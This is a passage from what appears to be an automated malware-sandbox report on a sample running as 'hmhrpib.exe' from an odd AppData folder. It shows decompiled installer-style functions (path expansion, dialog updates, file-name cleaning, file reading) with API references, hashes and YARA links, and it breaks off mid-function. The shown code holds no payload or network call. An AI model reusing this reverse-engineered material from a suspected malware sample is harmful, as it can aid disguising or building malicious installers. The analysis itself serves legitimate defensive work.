              • SetDlgItemTextW.USER32 ref: 00404B08
                • Part of subcall function 00405B86: GetDlgItemTextW.USER32 ref: 00405B99
                • Part of subcall function 004067EB: CharNextW.USER32(?,*?|<>/":,00000000,00000000,73BCFAA0,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe" ,004035B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822,?,00000007,00000009,0000000B), ref: 0040684E
                • Part of subcall function 004067EB: CharNextW.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 0040685D
                • Part of subcall function 004067EB: CharNextW.USER32(?,00000000,73BCFAA0,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe" ,004035B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822,?,00000007,00000009,0000000B), ref: 00406862
                • Part of subcall function 004067EB: CharPrevW.USER32(?,?,73BCFAA0,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe" ,004035B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822,?,00000007,00000009,0000000B), ref: 00406875
              • GetDiskFreeSpaceW.KERNEL32(00421718,?,?,0000040F,?,00421718,00421718,?,00000001,00421718,?,?,000003FB,?), ref: 00404BCB
              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404BE6
                • Part of subcall function 00404D3F: lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DE0
                • Part of subcall function 00404D3F: wsprintfW.USER32 ref: 00404DE9
                • Part of subcall function 00404D3F: SetDlgItemTextW.USER32 ref: 00404DFC
              Strings
              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000008.00000002.705721053.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705736390.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705749744.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705758823.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705773375.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705786752.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705793842.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705805319.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
              • String ID: A$C:\Users\user\AppData\Local\Temp$H7B$KXCJDFJSKF
              • API String ID: 2624150263-3518105192
              • Opcode ID: dd814ec643b45a90e93cf69e5cb033f89cff98d2f4c91cecb2b3846f87e86dba
              • Instruction ID: 8299be71a3cc8d15b5ba292867d4bcc1bae11f059afa92557538f40593a335a7
              • Opcode Fuzzy Hash: dd814ec643b45a90e93cf69e5cb033f89cff98d2f4c91cecb2b3846f87e86dba
              • Instruction Fuzzy Hash: 8EA193B1900209ABDB11AFA5DD45AAFB7B8EF84314F11803BF601B62D1D77C9941CB6D
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00406579, Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 209stringCOMMON
              Download Yara Rule
              C-Code - Quality: 72%
              			E00406579(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v8;
				struct _ITEMIDLIST* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t43;
				WCHAR* _t44;
				signed char _t46;
				signed int _t47;
				signed int _t48;
				short _t58;
				short _t60;
				short _t62;
				void* _t70;
				signed int _t76;
				void* _t82;
				signed char _t83;
				short _t86;
				signed int _t96;
				void* _t102;
				short _t103;
				signed int _t106;
				signed int _t108;
				void* _t109;
				WCHAR* _t110;
				void* _t112;

				_t109 = __esi;
				_t102 = __edi;
				_t70 = __ebx;
				_t43 = _a8;
				if(_t43 < 0) {
					_t43 =  *( *0x42923c - 4 + _t43 * 4);
				}
				_push(_t70);
				_push(_t109);
				_push(_t102);
				_t96 =  *0x42a2b8 + _t43 * 2;
				_t44 = 0x428200;
				_t110 = 0x428200;
				if(_a4 >= 0x428200 && _a4 - 0x428200 >> 1 < 0x800) {
					_t110 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t103 =  *_t96;
					if(_t103 == 0) {
						break;
					}
					__eflags = (_t110 - _t44 & 0xfffffffe) - 0x800;
					if((_t110 - _t44 & 0xfffffffe) >= 0x800) {
						break;
					}
					_t82 = 2;
					_t96 = _t96 + _t82;
					__eflags = _t103 - 4;
					_a8 = _t96;
					if(__eflags >= 0) {
						if(__eflags != 0) {
							 *_t110 = _t103;
							_t110 = _t110 + _t82;
							__eflags = _t110;
						} else {
							 *_t110 =  *_t96;
							_t110 = _t110 + _t82;
							_t96 = _t96 + _t82;
						}
						continue;
					}
					_t83 =  *((intOrPtr*)(_t96 + 1));
					_t46 =  *_t96;
					_t47 = _t46 & 0x000000ff;
					_v8 = (_t83 & 0x0000007f) << 0x00000007 | _t46 & 0x0000007f;
					_a8 = _a8 + 2;
					_v28 = _t47 | 0x00008000;
					_v24 = _t47;
					_t76 = _t83 & 0x000000ff;
					_v16 = _t76;
					__eflags = _t103 - 2;
					_v20 = _t76 | 0x00008000;
					if(_t103 != 2) {
						__eflags = _t103 - 3;
						if(_t103 != 3) {
							__eflags = _t103 - 1;
							if(_t103 == 1) {
								__eflags = (_t47 | 0xffffffff) - _v8;
								E00406579(_t76, _t103, _t110, _t110, (_t47 | 0xffffffff) - _v8);
							}
							L43:
							_t48 = lstrlenW(_t110);
							_t96 = _a8;
							_t110 =  &(_t110[_t48]);
							_t44 = 0x428200;
							continue;
						}
						_t106 = _v8;
						__eflags = _t106 - 0x1d;
						if(_t106 != 0x1d) {
							__eflags = (_t106 << 0xb) + 0x42b000;
							E0040653C(_t110, (_t106 << 0xb) + 0x42b000);
						} else {
							E00406483(_t110,  *0x42a268);
						}
						__eflags = _t106 + 0xffffffeb - 7;
						if(_t106 + 0xffffffeb < 7) {
							L34:
							E004067EB(_t110);
						}
						goto L43;
					}
					_t86 =  *0x42a26c;
					__eflags = _t86;
					_t108 = 2;
					if(_t86 >= 0) {
						L13:
						_v8 = 1;
						L14:
						__eflags =  *0x42a304;
						if( *0x42a304 != 0) {
							_t108 = 4;
						}
						__eflags = _t47;
						if(__eflags >= 0) {
							__eflags = _t47 - 0x25;
							if(_t47 != 0x25) {
								__eflags = _t47 - 0x24;
								if(_t47 == 0x24) {
									GetWindowsDirectoryW(_t110, 0x400);
									_t108 = 0;
								}
								while(1) {
									__eflags = _t108;
									if(_t108 == 0) {
										goto L30;
									}
									_t58 =  *0x42a264;
									_t108 = _t108 - 1;
									__eflags = _t58;
									if(_t58 == 0) {
										L26:
										_t60 = SHGetSpecialFolderLocation( *0x42a268,  *(_t112 + _t108 * 4 - 0x18),  &_v12);
										__eflags = _t60;
										if(_t60 != 0) {
											L28:
											 *_t110 =  *_t110 & 0x00000000;
											__eflags =  *_t110;
											continue;
										}
										__imp__SHGetPathFromIDListW(_v12, _t110);
										__imp__CoTaskMemFree(_v12);
										__eflags = _t60;
										if(_t60 != 0) {
											goto L30;
										}
										goto L28;
									}
									__eflags = _v8;
									if(_v8 == 0) {
										goto L26;
									}
									_t62 =  *_t58( *0x42a268,  *(_t112 + _t108 * 4 - 0x18), 0, 0, _t110);
									__eflags = _t62;
									if(_t62 == 0) {
										goto L30;
									}
									goto L26;
								}
								goto L30;
							}
							GetSystemDirectoryW(_t110, 0x400);
							goto L30;
						} else {
							E0040640A( *0x42a2b8, __eflags, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x42a2b8 + (_t47 & 0x0000003f) * 2, _t110, _t47 & 0x00000040);
							__eflags =  *_t110;
							if( *_t110 != 0) {
								L32:
								__eflags = _t76 - 0x1a;
								if(_t76 == 0x1a) {
									lstrcatW(_t110, L"\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L34;
							}
							E00406579(_t76, _t108, _t110, _t110, _t76);
							L30:
							__eflags =  *_t110;
							if( *_t110 == 0) {
								goto L34;
							}
							_t76 = _v16;
							goto L32;
						}
					}
					__eflags = _t86 - 0x5a04;
					if(_t86 == 0x5a04) {
						goto L13;
					}
					__eflags = _t76 - 0x23;
					if(_t76 == 0x23) {
						goto L13;
					}
					__eflags = _t76 - 0x2e;
					if(_t76 == 0x2e) {
						goto L13;
					} else {
						_v8 = _v8 & 0x00000000;
						goto L14;
					}
				}
				 *_t110 =  *_t110 & 0x00000000;
				if(_a4 == 0) {
					return _t44;
				}
				return E0040653C(_a4, _t44);
			}






























              0x00406579
              0x00406579
              0x00406579
              0x0040657f
              0x00406584
              0x00406595
              0x00406595
              0x0040659d
              0x0040659e
              0x0040659f
              0x004065a0
              0x004065a3
              0x004065ab
              0x004065ad
              0x004065c6
              0x004065c9
              0x004065c9
              0x004067c5
              0x004067c5
              0x004067cb
              0x00000000
              0x00000000
              0x004065d9
              0x004065df
              0x00000000
              0x00000000
              0x004065e7
              0x004065e8
              0x004065ea
              0x004065ee
              0x004065f1
              0x004067b2
              0x004067c0
              0x004067c3
              0x004067c3
              0x004067b4
              0x004067b7
              0x004067ba
              0x004067bc
              0x004067bc
              0x00000000
              0x004067b2
              0x004065f7
              0x004065fa
              0x00406609
              0x00406610
              0x0040661a
              0x0040661e
              0x00406621
              0x00406624
              0x00406629
              0x0040662e
              0x00406632
              0x00406635
              0x00406755
              0x00406759
              0x0040678c
              0x00406790
              0x00406795
              0x0040679a
              0x0040679a
              0x0040679f
              0x004067a0
              0x004067a5
              0x004067a8
              0x004067ab
              0x00000000
              0x004067ab
              0x0040675b
              0x0040675e
              0x00406761
              0x00406776
              0x0040677d
              0x00406763
              0x0040676a
              0x0040676a
              0x00406785
              0x00406788
              0x0040674d
              0x0040674e
              0x0040674e
              0x00000000
              0x00406788
              0x0040663b
              0x00406643
              0x00406645
              0x00406646
              0x0040665f
              0x0040665f
              0x00406666
              0x00406666
              0x0040666d
              0x00406671
              0x00406671
              0x00406672
              0x00406674
              0x004066af
              0x004066b2
              0x004066c2
              0x004066c5
              0x004066cd
              0x004066d3
              0x004066d3
              0x00406730
              0x00406730
              0x00406732
              0x00000000
              0x00000000
              0x004066d7
              0x004066de
              0x004066df
              0x004066e1
              0x004066fb
              0x00406709
              0x0040670f
              0x00406711
              0x0040672c
              0x0040672c
              0x0040672c
              0x00000000
              0x0040672c
              0x00406717
              0x00406722
              0x00406728
              0x0040672a
              0x00000000
              0x00000000
              0x00000000
              0x0040672a
              0x004066e3
              0x004066e6
              0x00000000
              0x00000000
              0x004066f5
              0x004066f7
              0x004066f9
              0x00000000
              0x00000000
              0x00000000
              0x004066f9
              0x00000000
              0x00406730
              0x004066ba
              0x00000000
              0x00406676
              0x00406694
              0x00406699
              0x0040669d
              0x0040673d
              0x0040673d
              0x00406740
              0x00406748
              0x00406748
              0x00000000
              0x00406740
              0x004066a5
              0x00406734
              0x00406734
              0x00406738
              0x00000000
              0x00000000
              0x0040673a
              0x00000000
              0x0040673a
              0x00406674
              0x00406648
              0x0040664d
              0x00000000
              0x00000000
              0x0040664f
              0x00406652
              0x00000000
              0x00000000
              0x00406654
              0x00406657
              0x00000000
              0x00406659
              0x00406659
              0x00000000
              0x00406659
              0x00406657
              0x004067d1
              0x004067dc
              0x004067e8
              0x004067e8
              0x00000000

              APIs
              • GetSystemDirectoryW.KERNEL32(KXCJDFJSKF,00000400), ref: 004066BA
              • GetWindowsDirectoryW.KERNEL32(KXCJDFJSKF,00000400,00000000,00422728,?,004055DB,00422728,00000000), ref: 004066CD
              • SHGetSpecialFolderLocation.SHELL32(004055DB,00000000,00000000,00422728,?,004055DB,00422728,00000000), ref: 00406709
              • SHGetPathFromIDListW.SHELL32(00000000,KXCJDFJSKF), ref: 00406717
              • CoTaskMemFree.OLE32(00000000), ref: 00406722
              • lstrcatW.KERNEL32(KXCJDFJSKF,\Microsoft\Internet Explorer\Quick Launch), ref: 00406748
              • lstrlenW.KERNEL32(KXCJDFJSKF,00000000,00422728,?,004055DB,00422728,00000000), ref: 004067A0
              Strings
              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000008.00000002.705721053.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705736390.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705749744.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705758823.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705773375.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705786752.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705793842.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705805319.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
              • String ID: KXCJDFJSKF$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
              • API String ID: 717251189-2443651505
              • Opcode ID: 461394275e41b2543b5fd82fcf6b9832f1e7dc77c54885fbf13ec40e6163d1f3
              • Instruction ID: 6f5f2b99d90c7511299ba9a64344c15edde84ad84532d0df03b232db96096e81
              • Opcode Fuzzy Hash: 461394275e41b2543b5fd82fcf6b9832f1e7dc77c54885fbf13ec40e6163d1f3
              • Instruction Fuzzy Hash: BA613671601111ABDF209F14DD80AAE37A5AF10718F52403FE943B72D0DB3E5AA6CB5D
              Uniqueness

              Uniqueness Score: -1.00%

              Function 004055A4, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72stringwindowCOMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E004055A4(signed int _a4, WCHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				WCHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				WCHAR* _t27;
				signed int _t28;
				long _t29;
				signed int _t37;
				signed int _t38;

				_t27 =  *0x429244;
				_v8 = _t27;
				if(_t27 != 0) {
					_t37 =  *0x42a334;
					_v12 = _t37;
					_t38 = _t37 & 0x00000001;
					if(_t38 == 0) {
						E00406579(_t38, 0, 0x422728, 0x422728, _a4);
					}
					_t27 = lstrlenW(0x422728);
					_a4 = _t27;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t27 = SetWindowTextW( *0x429228, 0x422728);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x422728;
							_v52 = 1;
							_t29 = SendMessageW(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t38;
							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52);
							_t27 = SendMessageW(_v8, 0x1013, _v48, 0);
						}
						if(_t38 != 0) {
							_t28 = _a4;
							0x422728[_t28] = 0;
							return _t28;
						}
					} else {
						_t27 = lstrlenW(_a8) + _a4;
						if(_t27 < 0x1000) {
							_t27 = lstrcatW(0x422728, _a8);
							goto L6;
						}
					}
				}
				return _t27;
			}

















              0x004055aa
              0x004055b4
              0x004055b9
              0x004055bf
              0x004055ca
              0x004055cd
              0x004055d0
              0x004055d6
              0x004055d6
              0x004055dc
              0x004055e4
              0x004055e7
              0x00405604
              0x00405608
              0x00405611
              0x00405611
              0x0040561b
              0x00405624
              0x00405630
              0x00405637
              0x0040563b
              0x0040563e
              0x00405651
              0x0040565f
              0x0040565f
              0x00405663
              0x00405665
              0x00405668
              0x00000000
              0x00405668
              0x004055e9
              0x004055f1
              0x004055f9
              0x004055ff
              0x00000000
              0x004055ff
              0x004055f9
              0x004055e7
              0x00405674

              APIs
              • lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00403040,00000000,?), ref: 004055DC
              • lstrlenW.KERNEL32(00403040,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00403040,00000000), ref: 004055EC
              • lstrcatW.KERNEL32(00422728,00403040), ref: 004055FF
              • SetWindowTextW.USER32(00422728,00422728), ref: 00405611
              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405637
              • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405651
              • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565F
              Strings
              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000008.00000002.705721053.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705736390.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705749744.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705758823.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705773375.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705786752.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705793842.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705805319.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: MessageSend$lstrlen$TextWindowlstrcat
              • String ID: ('B
              • API String ID: 2531174081-2332581011
              • Opcode ID: 8d4ec48a8783ac7c02cf808f938a66a70b9f0af433ef19620f9c759a8ff7b601
              • Instruction ID: cea8892cb4e31635aa5f40387e4ea582d2b984c796fabda61e5f1d3d18a4122e
              • Opcode Fuzzy Hash: 8d4ec48a8783ac7c02cf808f938a66a70b9f0af433ef19620f9c759a8ff7b601
              • Instruction Fuzzy Hash: E6218E71900518BACB119F65DD44ECFBFB9EF45360F54443AF904B62A0C77A4A508FA8
              Uniqueness

              Uniqueness Score: -1.00%

              Function 004067EB, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
              Download Yara Rule
              C-Code - Quality: 91%
              			E004067EB(WCHAR* _a4) {
				short _t5;
				short _t7;
				WCHAR* _t19;
				WCHAR* _t20;
				WCHAR* _t21;

				_t20 = _a4;
				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
					_t20 =  &(_t20[4]);
				}
				if( *_t20 != 0 && E00405E88(_t20) != 0) {
					_t20 =  &(_t20[2]);
				}
				_t5 =  *_t20;
				_t21 = _t20;
				_t19 = _t20;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((short*)(E00405E3E(L"*?|<>/\":", _t5))) == 0) {
							E00405FED(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
							_t19 = CharNextW(_t19);
						}
						_t20 = CharNextW(_t20);
						_t5 =  *_t20;
					} while (_t5 != 0);
				}
				 *_t19 =  *_t19 & 0x00000000;
				while(1) {
					_push(_t19);
					_push(_t21);
					_t19 = CharPrevW();
					_t7 =  *_t19;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t19 =  *_t19 & 0x00000000;
					if(_t21 < _t19) {
						continue;
					}
					break;
				}
				return _t7;
			}








              0x004067ed
              0x004067f6
              0x0040680d
              0x0040680d
              0x00406814
              0x00406820
              0x00406820
              0x00406823
              0x00406826
              0x0040682b
              0x0040682d
              0x00406836
              0x0040683a
              0x00406857
              0x0040685f
              0x0040685f
              0x00406864
              0x00406866
              0x00406869
              0x0040686e
              0x0040686f
              0x00406873
              0x00406873
              0x00406874
              0x0040687b
              0x0040687d
              0x00406884
              0x00000000
              0x00000000
              0x0040688c
              0x00406892
              0x00000000
              0x00000000
              0x00000000
              0x00406892
              0x00406897

              APIs
              • CharNextW.USER32(?,*?|<>/":,00000000,00000000,73BCFAA0,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe" ,004035B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822,?,00000007,00000009,0000000B), ref: 0040684E
              • CharNextW.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 0040685D
              • CharNextW.USER32(?,00000000,73BCFAA0,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe" ,004035B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822,?,00000007,00000009,0000000B), ref: 00406862
              • CharPrevW.USER32(?,?,73BCFAA0,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe" ,004035B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822,?,00000007,00000009,0000000B), ref: 00406875
              Strings
              • *?|<>/":, xrefs: 0040683D
              • "C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe" , xrefs: 004067EB
              • C:\Users\user\AppData\Local\Temp\, xrefs: 004067EC
              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000008.00000002.705721053.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705736390.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705749744.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705758823.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705773375.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705786752.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705793842.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705805319.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: Char$Next$Prev
              • String ID: "C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
              • API String ID: 589700163-832777236
              • Opcode ID: ad42b7741e5e7cf852433a5ca926bf711007504176ebaeb0857ba18f273580f2
              • Instruction ID: fdbe35b52bffc5d77a346742aeba0a27372f18d7f8de2c65e324d6b3b11dfc69
              • Opcode Fuzzy Hash: ad42b7741e5e7cf852433a5ca926bf711007504176ebaeb0857ba18f273580f2
              • Instruction Fuzzy Hash: 8211932780261255DB303B559C44AB762E8AF94790B56C83FED8A732C0EB7C4C9286BD
              Uniqueness

              Uniqueness Score: -1.00%

              Function 004044F9, Relevance: 12.1, APIs: 8, Instructions: 68COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E004044F9(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t39;
				long _t41;
				void* _t44;
				signed char _t50;
				long* _t54;

				if(_a4 + 0xfffffecd > 5) {
					L18:
					return 0;
				}
				_t54 = GetWindowLongW(_a12, 0xffffffeb);
				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
					goto L18;
				} else {
					_t50 = _t54[5];
					if((_t50 & 0xffffffe0) != 0) {
						goto L18;
					}
					_t39 =  *_t54;
					if((_t50 & 0x00000002) != 0) {
						_t39 = GetSysColor(_t39);
					}
					if((_t54[5] & 0x00000001) != 0) {
						SetTextColor(_a8, _t39);
					}
					SetBkMode(_a8, _t54[4]);
					_t41 = _t54[1];
					_v16.lbColor = _t41;
					if((_t54[5] & 0x00000008) != 0) {
						_t41 = GetSysColor(_t41);
						_v16.lbColor = _t41;
					}
					if((_t54[5] & 0x00000004) != 0) {
						SetBkColor(_a8, _t41);
					}
					if((_t54[5] & 0x00000010) != 0) {
						_v16.lbStyle = _t54[2];
						_t44 = _t54[3];
						if(_t44 != 0) {
							DeleteObject(_t44);
						}
						_t54[3] = CreateBrushIndirect( &_v16);
					}
					return _t54[3];
				}
			}









              0x0040450b
              0x004045c1
              0x00000000
              0x004045c1
              0x0040451c
              0x00404520
              0x00000000
              0x0040453a
              0x0040453a
              0x00404543
              0x00000000
              0x00000000
              0x00404545
              0x00404551
              0x00404554
              0x00404554
              0x0040455a
              0x00404560
              0x00404560
              0x0040456c
              0x00404572
              0x00404579
              0x0040457c
              0x0040457f
              0x00404581
              0x00404581
              0x00404589
              0x0040458f
              0x0040458f
              0x00404599
              0x0040459e
              0x004045a1
              0x004045a6
              0x004045a9
              0x004045a9
              0x004045b9
              0x004045b9
              0x00000000
              0x004045bc

              APIs
              • GetWindowLongW.USER32(?,000000EB), ref: 00404516
              • GetSysColor.USER32(00000000), ref: 00404554
              • SetTextColor.GDI32(?,00000000), ref: 00404560
              • SetBkMode.GDI32(?,?), ref: 0040456C
              • GetSysColor.USER32(?), ref: 0040457F
              • SetBkColor.GDI32(?,?), ref: 0040458F
              • DeleteObject.GDI32(?), ref: 004045A9
              • CreateBrushIndirect.GDI32(?), ref: 004045B3
              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000008.00000002.705721053.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705736390.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705749744.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705758823.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705773375.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705786752.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705793842.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705805319.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
              • String ID:
              • API String ID: 2320649405-0
              • Opcode ID: 288dbcc7c85f11a55b3e08142a2a7aff64d3670202badf385cb57de10b60d8c1
              • Instruction ID: b56a63bd10d9b88d704488fa4fc448251793e5de010e462820c933ca6d0d38e3
              • Opcode Fuzzy Hash: 288dbcc7c85f11a55b3e08142a2a7aff64d3670202badf385cb57de10b60d8c1
              • Instruction Fuzzy Hash: F52167B1500B04AFCB31DF68DD48A577BF8AF41714B048A2EEA96A26E1D734D904CF58
              Uniqueness

              Uniqueness Score: -1.00%

              Function 004026E4, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
              Download Yara Rule
              C-Code - Quality: 87%
              			E004026E4(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t72;
				void* _t76;
				void* _t79;

				_t72 = __edx;
				 *((intOrPtr*)(_t76 - 8)) = __ebx;
				_t65 = 2;
				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
				_t66 = E00402D1C(_t65);
				_t79 = _t66 - 1;
				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
				if(_t79 < 0) {
					L36:
					 *0x42a308 =  *0x42a308 +  *(_t76 - 4);
				} else {
					__ecx = 0x3ff;
					if(__eax > 0x3ff) {
						 *(__ebp - 0x44) = 0x3ff;
					}
					if( *__edi == __bx) {
						L34:
						__ecx =  *(__ebp - 0xc);
						__eax =  *(__ebp - 8);
						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
						if(_t79 == 0) {
							 *(_t76 - 4) = 1;
						}
						goto L36;
					} else {
						 *(__ebp - 0x38) = __ebx;
						 *(__ebp - 0x18) = E0040649C(__ecx, __edi);
						if( *(__ebp - 0x44) > __ebx) {
							do {
								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E00406113( *(__ebp - 0x18), __ebx) >= 0) {
										__eax = __ebp - 0x50;
										if(E004060B5( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
											goto L34;
										} else {
											goto L21;
										}
									} else {
										goto L34;
									}
								} else {
									__eax = __ebp - 0x40;
									_push(__ebx);
									_push(__ebp - 0x40);
									__eax = 2;
									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??);
									if(__eax == 0) {
										goto L34;
									} else {
										__ecx =  *(__ebp - 0x40);
										if(__ecx == __ebx) {
											goto L34;
										} else {
											__ax =  *(__ebp + 0xa) & 0x000000ff;
											 *(__ebp - 0x4c) = __ecx;
											 *(__ebp - 0x50) = __eax;
											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
												L28:
												__ax & 0x0000ffff = E00406483( *(__ebp - 0xc), __ax & 0x0000ffff);
											} else {
												__ebp - 0x50 = __ebp + 0xa;
												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, 1) != 0) {
													L21:
													__eax =  *(__ebp - 0x50);
												} else {
													__edi =  *(__ebp - 0x4c);
													__edi =  ~( *(__ebp - 0x4c));
													while(1) {
														_t22 = __ebp - 0x40;
														 *_t22 =  *(__ebp - 0x40) - 1;
														__eax = 0xfffd;
														 *(__ebp - 0x50) = 0xfffd;
														if( *_t22 == 0) {
															goto L22;
														}
